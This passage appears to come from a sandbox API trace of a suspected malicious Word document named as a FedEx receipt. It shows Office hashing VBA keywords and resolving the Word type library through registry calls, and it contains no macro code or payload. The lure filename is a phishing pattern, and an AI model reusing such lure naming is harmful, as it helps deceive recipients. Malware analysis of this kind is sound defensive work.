szName="DoEvents") returned 0x109634 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0040.943] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0040.944] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0040.947] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0040.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0040.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0040.950] StringFromGUID2 (in: rguid=0x691f350*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x186530, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0040.950] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1861f0 | out: phkResult=0x1861f0*=0x9da) returned 0x0 [0040.950] RegOpenKeyW (in: hKey=0x9da, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x1861e8 | out: phkResult=0x1861e8*=0x9ea) returned 0x0 [0040.950] RegEnumKeyW (in: hKey=0x9ea, dwIndex=0x0, lpName=0x186218, cchName=0xa | out: lpName="8.7") returned 0x0 [0040.951] wcscpy_s (in: _Destination=0x186200, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0040.951] RegOpenKeyW (in: hKey=0x9ea, lpSubKey="8.7", phkResult=0x1862a8 | out: phkResult=0x1862a8*=0x9f2) returned 0x0 [0040.951] _ultoa_s (in: _Val=0x409, _DstBuf=0x186220, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0040.951] RegOpenKeyA (in: hKey=0x9f2, lpSubKey="409", phkResult=0x186210 | out: phkResult=0x186210*=0x0) returned 0x2 [0040.951] _ultoa_s (in: _Val=0x9, _DstBuf=0x186220, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0040.951] RegOpenKeyA (in: hKey=0x9f2, lpSubKey="9", phkResult=0x186210 | out: phkResult=0x186210*=0x0) returned 0x2 [0040.952] RegOpenKeyA (in: hKey=0x9f2, lpSubKey="0", phkResult=0x186210 | out: phkResult=0x186210*=0x9fa) returned 0x0 [0040.952] RegOpenKeyW (in: hKey=0x9fa, lpSubKey="win64", phkResult=0x186218 | out: phkResult=0x186218*=0xa02) returned 0x0 [0040.953] RegCloseKey (hKey=0xa02) returned 0x0 [0040.953] RegCloseKey (hKey=0x9fa) returned 0x0 [0040.953] _ultow_s (in: _Value=0x0, _Buffer=0x1862b0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0040.953] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="0", phkResult=0x186288 | out: phkResult=0x186288*=0x9f6) returned 0x0 [0040.953] RegQueryValueW (in: hKey=0x9f6, lpSubKey="win64", lpData=0x1862d0, lpcbData=0x186284 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x186284) returned 0x0 [0040.954] wcscpy_s (in: _Destination=0x186600, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0040.954] RegCloseKey (hKey=0x9f6) returned 0x0 [0040.954] RegCloseKey (hKey=0x9f2) returned 0x0 [0040.954] RegCloseKey (hKey=0x9ea) returned 0x0 [0040.954] RegCloseKey (hKey=0x9da) returned 0x0 [0040.955] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x186288*=0x0 | out: pptlib=0x186288*=0x6992850) returned 0x0 [0040.955] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x1862a8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4ddc7d8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4ddc7d8) returned 0x0 [0040.955] IUnknown:QueryInterface (in: This=0x6992850, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186098 | out: ppvObject=0x186098*=0x0) returned 0x80004002 [0040.955] ITypeLib:RemoteGetLibAttr (in: This=0x6992850, ppTLibAttr=0x186090, pDummy=0x10 | out: ppTLibAttr=0x186090, pDummy=0x10) returned 0x0 [0040.955] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x0, pbstrName=0x186088, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6b245a0 | out: pbstrName=0x186088*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6b245a0*="\x1dd0\xf86c\x7fe") returned 0x0 [0040.955] StringFromGUID2 (in: rguid=0x68f0150*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1860b0, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0040.955] _ultow_s (in: _Value=0x8, _Buffer=0x185ffa, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0040.955] _ultow_s (in: _Value=0x7, _Buffer=0x185ffe, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0040.955] _ultow_s (in: _Value=0x0, _Buffer=0x186002, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0040.955] wcscpy_s (in: _Destination=0x3ea0b88, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0040.955] wcscpy_s (in: _Destination=0x3ea0b8e, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0040.955] wcscpy_s (in: _Destination=0x3ea0bda, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0040.955] wcscpy_s (in: _Destination=0x3ea0be8, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0040.955] wcscpy_s (in: _Destination=0x3ea0c5e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0040.955] ITypeLib:LocalReleaseTLibAttr (This=0x6992850) returned 0x0 [0040.955] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9cfa0, cb=0x1a0) returned 0x6a0ee20 [0040.955] wcscpy_s (in: _Destination=0x6a0ee20, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0040.956] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x1861a8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0040.956] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0040.956] strcpy_s (in: _Dst=0x185fa0, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0040.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185fa0, cbMultiByte=5, lpWideCharStr=0x185df0, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0040.956] wcsncpy_s (in: _Destination=0x185da0, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0040.956] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0040.956] IMalloc:Alloc (This=0x7feffc15380, cb=0x11c) returned 0x6b1fd30 [0040.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x6b1fd30, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0040.956] IMalloc:Free (This=0x7feffc15380, pv=0x6b1fd30) [0040.956] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 4 [0040.956] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ba2b80, cb=0x220) returned 0x6aefe70 [0040.956] wcscpy_s (in: _Destination=0x6aeff20, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0040.956] wcsncpy_s (in: _Destination=0x185de0, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0040.956] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0040.956] IMalloc:Alloc (This=0x7feffc15380, cb=0x11c) returned 0x6b1fd30 [0040.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x6b1fd30, cbMultiByte=284, 